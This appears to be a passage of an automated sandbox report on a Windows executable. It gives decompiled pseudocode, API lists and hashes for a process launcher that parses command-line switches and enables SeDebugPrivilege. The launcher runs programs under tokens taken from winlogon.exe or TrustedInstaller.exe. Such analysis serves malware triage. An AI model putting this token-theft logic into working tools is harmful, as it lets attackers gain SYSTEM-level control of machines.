                                                                                      						if(_t175 != 0x20) {
                                                                                      							_v12 = _t175;
                                                                                      						}
                                                                                      						_t311 = _a4;
                                                                                      						if(_t315[0x2254] == 2) {
                                                                                      							E00401D1E(_t311, L"RunAsInvoker");
                                                                                      						}
                                                                                      						_t176 = _t315[0x265c];
                                                                                      						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
                                                                                      							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
                                                                                      						}
                                                                                      						_t177 = _t315[0x265e];
                                                                                      						if(_t177 != 1) {
                                                                                      							__eflags = _t177 - 2;
                                                                                      							if(_t177 != 2) {
                                                                                      								goto L37;
                                                                                      							}
                                                                                      							_push(L"16BITCOLOR");
                                                                                      							goto L36;
                                                                                      						} else {
                                                                                      							_push(L"256COLOR");
                                                                                      							L36:
                                                                                      							E00401D1E(_t311);
                                                                                      							L37:
                                                                                      							if(_t315[0x2660] == _t286) {
                                                                                      								__eflags = _t315[0x2662] - _t286;
                                                                                      								if(_t315[0x2662] == _t286) {
                                                                                      									__eflags = _t315[0x2664] - _t286;
                                                                                      									if(_t315[0x2664] == _t286) {
                                                                                      										__eflags = _t315[0x2666] - _t286;
                                                                                      										if(_t315[0x2666] == _t286) {
                                                                                      											L46:
                                                                                      											_t178 = _t315[0x2a6e];
                                                                                      											_t358 = _t178 - 3;
                                                                                      											if(_t178 != 3) {
                                                                                      												__eflags = _t178 - 2;
                                                                                      												if(_t178 != 2) {
                                                                                      													__eflags =  *_t311 - _t286;
                                                                                      													if( *_t311 == _t286) {
                                                                                      														_push(_t286);
                                                                                      													} else {
                                                                                      														_push(_t311);
                                                                                      													}
                                                                                      													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
                                                                                      													L63:
                                                                                      													_t293 = _t311;
                                                                                      													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
                                                                                      													_t312 = _t184;
                                                                                      													if(_t312 == _t286 && _v60 != _t286) {
                                                                                      														_t363 = _t315[0x266c] - _t286;
                                                                                      														if(_t315[0x266c] != _t286) {
                                                                                      															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
                                                                                      															_a4 = _a4 | 0xffffffff;
                                                                                      															_a8 = _t286;
                                                                                      															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
                                                                                      															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
                                                                                      														}
                                                                                      													}
                                                                                      													E004055D1(_t184,  &_v44);
                                                                                      													return _t312;
                                                                                      												}
                                                                                      												E00405497( &_v92);
                                                                                      												E00405497( &_v228);
                                                                                      												E0040149F(__eflags,  &_v92);
                                                                                      												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
                                                                                      												E00401551( &_v228, _t304, __eflags,  &_v92);
                                                                                      												_t204 = _a4;
                                                                                      												__eflags =  *_a4;
                                                                                      												if(__eflags != 0) {
                                                                                      													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
                                                                                      												}
                                                                                      												E00401421( &_v44, _t304,  &_v92, __eflags);
                                                                                      												_t207 = _v28;
                                                                                      												__eflags = _t207;
                                                                                      												_v16 = 0x40c4e8;
                                                                                      												if(_t207 != 0) {
                                                                                      													_v16 = _t207;
                                                                                      												}
                                                                                      												_v12 = _v12 | 0x00000400;
                                                                                      												E004054B9( &_v228);
                                                                                      												E004054B9( &_v92);
                                                                                      												_t286 = 0;
                                                                                      												__eflags = 0;
                                                                                      												L58:
                                                                                      												_t315 = _a8;
                                                                                      												_t311 = _a4;
                                                                                      												goto L63;
                                                                                      											}
                                                                                      											E00405497( &_v92);
                                                                                      											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
                                                                                      											_t359 =  *_t311 - _t286;
                                                                                      											if( *_t311 != _t286) {
                                                                                      												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
                                                                                      											}
                                                                                      											E00401421( &_v44, _t304,  &_v92, _t359);
                                                                                      											_t219 = _v28;
                                                                                      											_v16 = 0x40c4e8;
                                                                                      											if(_t219 != _t286) {
                                                                                      												_v16 = _t219;
                                                                                      											}
                                                                                      											_v12 = _v12 | 0x00000400;
                                                                                      											E004054B9( &_v92);
                                                                                      											goto L58;
                                                                                      										}
                                                                                      										_push(L"HIGHDPIAWARE");
                                                                                      										L45:
                                                                                      										E00401D1E(_t311);
                                                                                      										goto L46;
                                                                                      									}
                                                                                      									_push(L"DISABLEDWM");
                                                                                      									goto L45;
                                                                                      								}
                                                                                      								_push(L"DISABLETHEMES");
                                                                                      								goto L45;
                                                                                      							}
                                                                                      							_push(L"640X480");
                                                                                      							goto L45;
                                                                                      						}
                                                                                      					}
                                                                                      					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
                                                                                      					L10:
                                                                                      					_v20 =  &_v1316;
                                                                                      					goto L11;
                                                                                      				}
                                                                                      			}
                                                                                      0x0040246a
                                                                                      0x00402470
                                                                                      0x00000000
                                                                                      0x00402470

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00402300
                                                                                      • memset.MSVCRT ref: 0040233E
                                                                                      • memset.MSVCRT ref: 00402356
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                      • wcschr.MSVCRT ref: 00402387
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                        • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                        • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                      • wcschr.MSVCRT ref: 004023B7
                                                                                      • memset.MSVCRT ref: 004023D9
                                                                                      • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                      • wcschr.MSVCRT ref: 0040242B
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                      • memset.MSVCRT ref: 004024BE
                                                                                      • memset.MSVCRT ref: 004024D1
                                                                                      • _wtoi.MSVCRT ref: 00402519
                                                                                      • _wtoi.MSVCRT ref: 0040252B
                                                                                      • memset.MSVCRT ref: 00402561
                                                                                      • memset.MSVCRT ref: 00402574
                                                                                      • _wtoi.MSVCRT ref: 004025BC
                                                                                      • _wtoi.MSVCRT ref: 004025CE
                                                                                      • wcschr.MSVCRT ref: 004025F0
                                                                                      • memset.MSVCRT ref: 0040260F
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                      • _snwprintf.MSVCRT ref: 0040264C
                                                                                      • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                      • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                      • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                      • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                      • API String ID: 2452314994-435178042
                                                                                      • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                      • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                      • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                      • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 89%
                                                                                      			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                                      				char _v0;
                                                                                      				WCHAR* _v4;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* _t76;
                                                                                      				void* _t82;
                                                                                      				wchar_t* _t85;
                                                                                      				void* _t86;
                                                                                      				void* _t87;
                                                                                      				intOrPtr _t92;
                                                                                      				wchar_t* _t93;
                                                                                      				intOrPtr _t95;
                                                                                      				int _t106;
                                                                                      				char* _t110;
                                                                                      				intOrPtr _t115;
                                                                                      				wchar_t* _t117;
                                                                                      				intOrPtr _t124;
                                                                                      				wchar_t* _t125;
                                                                                      				intOrPtr _t131;
                                                                                      				wchar_t* _t132;
                                                                                      				int _t156;
                                                                                      				void* _t159;
                                                                                      				intOrPtr _t162;
                                                                                      				void* _t177;
                                                                                      				void* _t178;
                                                                                      				void* _t179;
                                                                                      				intOrPtr _t181;
                                                                                      				int _t187;
                                                                                      				intOrPtr _t188;
                                                                                      				intOrPtr _t190;
                                                                                      				intOrPtr _t198;
                                                                                      				signed int _t205;
                                                                                      				signed int _t206;
                                                                                      
                                                                                      				_t179 = __edx;
                                                                                      				_t158 = __ecx;
                                                                                      				_t206 = _t205 & 0xfffffff8;
                                                                                      				E0040B550(0x1ccc, __ecx);
                                                                                      				_t76 = E0040313D(_t158);
                                                                                      				if(_t76 != 0) {
                                                                                      					E0040AC52();
                                                                                      					SetErrorMode(0x8001); // executed
                                                                                      					_t156 = 0;
                                                                                      					 *0x40fa70 = 0x11223344;
                                                                                      					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                                      					_t82 = E00405497( &_a8);
                                                                                      					_a48 = 0x20;
                                                                                      					_a40 = 0;
                                                                                      					_a52 = 0;
                                                                                      					_a44 = 0;
                                                                                      					_a56 = 0;
                                                                                      					E004056B5(_t158, __eflags, _t82, _a12);
                                                                                      					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                                      					 *_t206 = L"/SpecialRun";
                                                                                      					_t85 = E0040585C( &_v0);
                                                                                      					__eflags = _t85;
                                                                                      					if(_t85 != 0) {
                                                                                      						L8:
                                                                                      						_t86 = E0040585C( &_a8, L"/Run");
                                                                                      						__eflags = _t86 - _t156;
                                                                                      						if(_t86 < _t156) {
                                                                                      							_t87 = E0040585C( &_a8, L"/cfg");
                                                                                      							__eflags = _t87 - _t156;
                                                                                      							if(_t87 >= _t156) {
                                                                                      								_t162 =  *0x40fa74; // 0x4101c8
                                                                                      								_t41 = _t87 + 1; // 0x1
                                                                                      								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                                      								_t115 =  *0x40fa74; // 0x4101c8
                                                                                      								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                                      								__eflags = _t117;
                                                                                      								if(_t117 == 0) {
                                                                                      									_a92 = _t156;
                                                                                      									memset( &_a94, _t156, 0x208);
                                                                                      									_a620 = _t156;
                                                                                      									memset( &_a622, _t156, 0x208);
                                                                                      									GetCurrentDirectoryW(0x104,  &_a92);
                                                                                      									_t124 =  *0x40fa74; // 0x4101c8
                                                                                      									_t125 = _t124 + 0x5504;
                                                                                      									_v4 = _t125;
                                                                                      									_t187 = wcslen(_t125);
                                                                                      									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                                      									__eflags = _t187 + _t51 - 0x104;
                                                                                      									if(_t187 + _t51 >= 0x104) {
                                                                                      										_a620 = _t156;
                                                                                      									} else {
                                                                                      										E00404BE4( &_a620,  &_a92, _v4);
                                                                                      									}
                                                                                      									_t131 =  *0x40fa74; // 0x4101c8
                                                                                      									_t132 = _t131 + 0x5504;
                                                                                      									__eflags = _t132;
                                                                                      									wcscpy(_t132,  &_a620);
                                                                                      								}
                                                                                      							}
                                                                                      							E00402F31(_t156);
                                                                                      							_t181 =  *0x40fa74; // 0x4101c8
                                                                                      							_pop(_t159);
                                                                                      							_a84 =  &_a8;
                                                                                      							_a76 = 0x40cb0c;
                                                                                      							_a88 = _t156;
                                                                                      							_a80 = _t156;
                                                                                      							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                                      							_t92 =  *0x40fa74; // 0x4101c8
                                                                                      							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                                      							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                                      								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                                      								__eflags = _t93;
                                                                                      								if(_t93 < 0) {
                                                                                      									E00406420();
                                                                                      									__imp__CoInitialize(_t156);
                                                                                      									_t95 =  *0x40fa74; // 0x4101c8
                                                                                      									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                                      									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                                      									_t198 =  *0x40fa74; // 0x4101c8
                                                                                      									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                                      									E00402F31(1);
                                                                                      									__imp__CoUninitialize();
                                                                                      								} else {
                                                                                      									E004065BE(_t159);
                                                                                      								}
                                                                                      								goto L7;
                                                                                      							} else {
                                                                                      								_t64 = _t92 + 0x10; // 0x4101d8
                                                                                      								_a7356 = _t156;
                                                                                      								_a7352 = _t156;
                                                                                      								_a7340 = _t156;
                                                                                      								_a7344 = _t156;
                                                                                      								_a7348 = _t156;
                                                                                      								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                                      								_t110 =  &_a5288;
                                                                                      								L6:
                                                                                      								E004035FB(_t110);
                                                                                      								L7:
                                                                                      								E004054B9( &_v0);
                                                                                      								E004099D4( &_a32);
                                                                                      								E004054B9( &_v0);
                                                                                      								_t106 = _t156;
                                                                                      								goto L2;
                                                                                      							}
                                                                                      						}
                                                                                      						_t26 = _t86 + 1; // 0x1
                                                                                      						_t173 = _t26;
                                                                                      						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                                      						if(__eflags == 0) {
                                                                                      							E00402F31(_t156);
                                                                                      						} else {
                                                                                      							E00402FC6(_t173, __eflags, _t138);
                                                                                      						}
                                                                                      						_t188 =  *0x40fa74; // 0x4101c8
                                                                                      						_a68 =  &_a8;
                                                                                      						_a60 = 0x40cb0c;
                                                                                      						_a72 = _t156;
                                                                                      						_a64 = _t156;
                                                                                      						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                                      						_t190 =  *0x40fa74; // 0x4101c8
                                                                                      						_a5280 = _t156;
                                                                                      						_a5276 = _t156;
                                                                                      						_a5264 = _t156;
                                                                                      						_a5268 = _t156;
                                                                                      						_a5272 = _t156;
                                                                                      						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                                      						_t110 =  &_a3212;
                                                                                      						goto L6;
                                                                                      					}
                                                                                      					__eflags = _a56 - 3;
                                                                                      					if(_a56 != 3) {
                                                                                      						goto L8;
                                                                                      					}
                                                                                      					__eflags = 1;
                                                                                      					_a3212 = 0;
                                                                                      					_a3208 = 0;
                                                                                      					_a3196 = 0;
                                                                                      					_a3200 = 0;
                                                                                      					_a3204 = 0;
                                                                                      					_v4 = 0;
                                                                                      					_v0 = 0;
                                                                                      					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                                      					_t177 = 2;
                                                                                      					_push(E0040584C( &_v0, _t177));
                                                                                      					L0040B1F8();
                                                                                      					_pop(_t178);
                                                                                      					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
                                                                                      					_t110 =  &_a1132;
                                                                                      					goto L6;
                                                                                      				} else {
                                                                                      					_t106 = _t76 + 1;
                                                                                      					L2:
                                                                                      					return _t106;
                                                                                      				}
                                                                                      			}





































                                                                                      APIs
                                                                                        • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                        • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                        • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                        • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                      • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                      • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                      • swscanf.MSVCRT ref: 00408620
                                                                                      • _wtoi.MSVCRT ref: 00408633
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                      • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                      • API String ID: 3933224404-3784219877
                                                                                      • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                      • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                      • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                      • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 81%
                                                                                      			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                                      				int _v8;
                                                                                      				long _v12;
                                                                                      				wchar_t* _v16;
                                                                                      				void _v546;
                                                                                      				long _v548;
                                                                                      				void _v1074;
                                                                                      				char _v1076;
                                                                                      				void* __esi;
                                                                                      				long _t84;
                                                                                      				int _t87;
                                                                                      				wchar_t* _t88;
                                                                                      				int _t92;
                                                                                      				void* _t93;
                                                                                      				int _t94;
                                                                                      				int _t96;
                                                                                      				int _t99;
                                                                                      				int _t104;
                                                                                      				long _t105;
                                                                                      				int _t110;
                                                                                      				void** _t112;
                                                                                      				int _t113;
                                                                                      				intOrPtr _t131;
                                                                                      				wchar_t* _t132;
                                                                                      				int* _t148;
                                                                                      				wchar_t* _t149;
                                                                                      				int _t151;
                                                                                      				void* _t152;
                                                                                      				void* _t153;
                                                                                      				int _t154;
                                                                                      				void* _t155;
                                                                                      				long _t160;
                                                                                      
                                                                                      				_t145 = __edx;
                                                                                      				_t152 = __ecx;
                                                                                      				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                                      				_v12 = 0;
                                                                                      				if(_t131 != 4) {
                                                                                      					__eflags = _t131 - 5;
                                                                                      					if(_t131 != 5) {
                                                                                      						__eflags = _t131 - 9;
                                                                                      						if(__eflags != 0) {
                                                                                      							__eflags = _t131 - 8;
                                                                                      							if(_t131 != 8) {
                                                                                      								__eflags = _t131 - 6;
                                                                                      								if(_t131 != 6) {
                                                                                      									__eflags = _t131 - 7;
                                                                                      									if(_t131 != 7) {
                                                                                      										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                                      									} else {
                                                                                      										_t132 = __eax + 0x46b6;
                                                                                      										_t148 = __eax + 0x48b6;
                                                                                      										__eflags =  *_t148;
                                                                                      										_v16 = _t132;
                                                                                      										_v8 = __eax + 0x4ab6;
                                                                                      										if( *_t148 == 0) {
                                                                                      											_t88 = wcschr(_t132, 0x40);
                                                                                      											__eflags = _t88;
                                                                                      											if(_t88 != 0) {
                                                                                      												_t148 = 0;
                                                                                      												__eflags = 0;
                                                                                      											}
                                                                                      										}
                                                                                      										_t153 = _t152 + 0x800;
                                                                                      										E0040289F(_t153);
                                                                                      										_t154 =  *(_t153 + 0xc);
                                                                                      										__eflags = _t154;
                                                                                      										if(_t154 == 0) {
                                                                                      											_t87 = 0;
                                                                                      											__eflags = 0;
                                                                                      										} else {
                                                                                      											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                      										}
                                                                                      										__eflags = _t87;
                                                                                      									}
                                                                                      									if(__eflags == 0) {
                                                                                      										_t84 = GetLastError();
                                                                                      										L43:
                                                                                      										_v12 = _t84;
                                                                                      									}
                                                                                      									goto L44;
                                                                                      								}
                                                                                      								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                                      								if(__eflags == 0) {
                                                                                      									goto L44;
                                                                                      								}
                                                                                      								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                      								__eflags = _t92;
                                                                                      								if(_t92 != 0) {
                                                                                      									goto L44;
                                                                                      								}
                                                                                      								_t84 = _a28;
                                                                                      								goto L43;
                                                                                      							}
                                                                                      							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                                      							__eflags = _t93;
                                                                                      							if(_t93 != 0) {
                                                                                      								E00401306(_t93); // executed
                                                                                      							}
                                                                                      							_v8 = 0;
                                                                                      							_t94 = E00401F04(_t145, _t152); // executed
                                                                                      							__eflags = _t94;
                                                                                      							_v12 = _t94;
                                                                                      							if(__eflags == 0) {
                                                                                      								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                                      								__eflags = _t96;
                                                                                      								_v12 = _t96;
                                                                                      								if(_t96 == 0) {
                                                                                      									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                      									__eflags = _t99;
                                                                                      									if(_t99 == 0) {
                                                                                      										_v12 = GetLastError();
                                                                                      									}
                                                                                      									CloseHandle(_v8); // executed
                                                                                      								}
                                                                                      								RevertToSelf(); // executed
                                                                                      							}
                                                                                      							goto L44;
                                                                                      						}
                                                                                      						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                                      						__eflags = _t104;
                                                                                      						if(_t104 == 0) {
                                                                                      							goto L44;
                                                                                      						}
                                                                                      						_v8 = 0;
                                                                                      						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					_t149 = __eax + 0x44ac;
                                                                                      					_t110 = wcslen(_t149);
                                                                                      					__eflags = _t110;
                                                                                      					if(_t110 <= 0) {
                                                                                      						goto L44;
                                                                                      					} else {
                                                                                      						_v8 = 0;
                                                                                      						__eflags = E00404EA9(_t149, _t110);
                                                                                      						_t112 =  &_v8;
                                                                                      						_push(_t112);
                                                                                      						_push(_t149);
                                                                                      						if(__eflags == 0) {
                                                                                      							_push(_t152);
                                                                                      							_t113 = E00401DF9(_t145, __eflags);
                                                                                      						} else {
                                                                                      							L0040B1F8();
                                                                                      							_push(_t112);
                                                                                      							_push(_t152);
                                                                                      							_t113 = E00401E44();
                                                                                      						}
                                                                                      						_v12 = _t113;
                                                                                      						__eflags = _t113;
                                                                                      						goto L15;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_v548 = 0;
                                                                                      					memset( &_v546, 0, 0x208);
                                                                                      					_v1076 = 0;
                                                                                      					memset( &_v1074, 0, 0x208);
                                                                                      					E00404C3C( &_v548);
                                                                                      					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                                      					_t151 = wcslen(??);
                                                                                      					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                                      					_t159 = _t151 + _t10 - 0x104;
                                                                                      					if(_t151 + _t10 >= 0x104) {
                                                                                      						_v1076 = 0;
                                                                                      					} else {
                                                                                      						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                                      					}
                                                                                      					_v8 = 0;
                                                                                      					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                                      					L14:
                                                                                      					_t160 = _t105;
                                                                                      					_v12 = _t105;
                                                                                      					L15:
                                                                                      					if(_t160 == 0) {
                                                                                      						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                                      							_v12 = GetLastError();
                                                                                      						}
                                                                                      						CloseHandle(_v8);
                                                                                      					}
                                                                                      					L44:
                                                                                      					return _v12;
                                                                                      				}
                                                                                      			}



































                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040201D
                                                                                      • memset.MSVCRT ref: 00402035
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                      • wcslen.MSVCRT ref: 00402050
                                                                                      • wcslen.MSVCRT ref: 0040205F
                                                                                      • wcslen.MSVCRT ref: 004020B4
                                                                                      • _wtoi.MSVCRT ref: 004020D7
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                      • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                      • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                        • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                        • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                        • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                        • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                        • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                        • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                        • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                        • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                        • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                        • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                        • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                        • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                        • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                      • wcschr.MSVCRT ref: 00402259
                                                                                      • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
